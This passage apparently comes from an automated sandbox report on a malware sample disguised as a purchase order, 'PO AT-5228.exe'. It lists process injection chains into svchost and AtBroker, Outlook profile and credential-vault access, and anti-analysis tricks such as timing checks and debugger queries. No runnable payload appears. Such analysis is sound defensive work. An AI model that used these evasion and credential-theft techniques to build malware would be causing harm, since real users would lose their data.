                Source: C:\Users\user\Desktop\PO AT-5228.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO AT-5228.exe"
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO AT-5228.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO AT-5228.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO AT-5228.exeStatic file information: File size 1175040 > 1048576
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BLUymyzgBTyhbo.exe, 00000002.00000002.3524476416.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3524287384.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
                Source: PO AT-5228.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PO AT-5228.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PO AT-5228.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PO AT-5228.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PO AT-5228.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7E01E LoadLibraryA,GetProcAddress,0_2_00B7E01E
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8C09E push esi; ret 0_2_00B8C0A0
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8C187 push edi; ret 0_2_00B8C189
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BCC8BC push esi; ret 0_2_00BCC8BE
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B86B05 push ecx; ret 0_2_00B86B18
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BCED2A push ss; retn 0000h0_2_00BCED2B
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAB2B1 push FFFFFF8Bh; iretd 0_2_00BAB2B3
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8BDAA push edi; ret 0_2_00B8BDAC
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8BEC3 push esi; ret 0_2_00B8BEC5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00441AAD push 5BDF9A96h; iretd 1_2_00441ACA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00442099 push esp; ret 1_2_0044209A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00443390 push eax; ret 1_2_00443392
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00444C75 push cs; iretd 1_2_00444C8B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0044847B push cs; retf 1_2_0044847E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00444D15 pushad ; ret 1_2_00444D16
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0046D533 pushfd ; retf 1_2_0046D552
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00444DBA push 6B6FB766h; ret 1_2_00444DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0045277B push edi; iretd 1_2_0045278D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0225F pushad ; ret 1_2_02E027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E027FA pushad ; ret 1_2_02E027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0283D push eax; iretd 1_2_02E02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD push ecx; mov dword ptr [esp], ecx1_2_02E309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E01368 push eax; iretd 1_2_02E01369
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B3DD0 push edi; iretd 2_2_052B3DE2
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052A640F push 6B6FB766h; ret 2_2_052A6414
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052C01F6 push ebx; ret 2_2_052C01FC
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052A636A pushad ; ret 2_2_052A636B
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052BAB64 push eax; retf 2_2_052BABDA
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052A62CA push cs; iretd 2_2_052A62E0
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052A9AD0 push cs; retf 2_2_052A9AD3
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045827FA pushad ; ret 3_2_045827F9
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0458225F pushad ; ret 3_2_045827F9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BC8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00BC8111
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B7EB42
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B8123A
                Source: C:\Users\user\Desktop\PO AT-5228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\PO AT-5228.exeAPI/Special instruction interceptor: Address: 19608C4
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E rdtsc 1_2_02E7096E
                Source: C:\Users\user\Desktop\PO AT-5228.exeEvaded block: after key decisiongraph_0-94478
                Source: C:\Users\user\Desktop\PO AT-5228.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-96237
                Source: C:\Users\user\Desktop\PO AT-5228.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7424Thread sleep count: 49 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7424Thread sleep time: -98000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe TID: 7564Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe TID: 7564Thread sleep time: -43500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BA6CA9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00BA60DD
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00BA63F9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BAEB60
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BAF5FA
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAF56F FindFirstFileW,FindClose,0_2_00BAF56F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1B2F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1C8A
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BB1F94
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004FC830 FindFirstFileW,FindNextFileW,FindClose,3_2_004FC830
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B7DDC0
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525186169.00000000013AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: firefox.exe, 00000008.00000002.2120522294.0000021D4D29C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                Source: AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exeAPI call chain: ExitProcess graph end nodegraph_0-94765
                Source: C:\Users\user\Desktop\PO AT-5228.exeAPI call chain: ExitProcess graph end nodegraph_0-93644
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E rdtsc 1_2_02E7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00457B23 LdrLoadDll,1_2_00457B23
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB6AAF BlockInput,0_2_00BB6AAF
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B63D19
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B93920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00B93920
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7E01E LoadLibraryA,GetProcAddress,0_2_00B7E01E
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_0195F530 mov eax, dword ptr fs:[00000030h]0_2_0195F530
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_01960B90 mov eax, dword ptr fs:[00000030h]0_2_01960B90
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_01960B30 mov eax, dword ptr fs:[00000030h]0_2_01960B30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h]1_2_02E402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h]1_2_02E402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h]1_2_02E402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F062D6 mov eax, dword ptr fs:[00000030h]1_2_02F062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402A0 mov eax, dword ptr fs:[00000030h]1_2_02E402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402A0 mov eax, dword ptr fs:[00000030h]1_2_02E402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E284 mov eax, dword ptr fs:[00000030h]1_2_02E6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E284 mov eax, dword ptr fs:[00000030h]1_2_02E6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h]1_2_02EB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h]1_2_02EB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h]1_2_02EB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h]1_2_02E34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h]1_2_02E34260
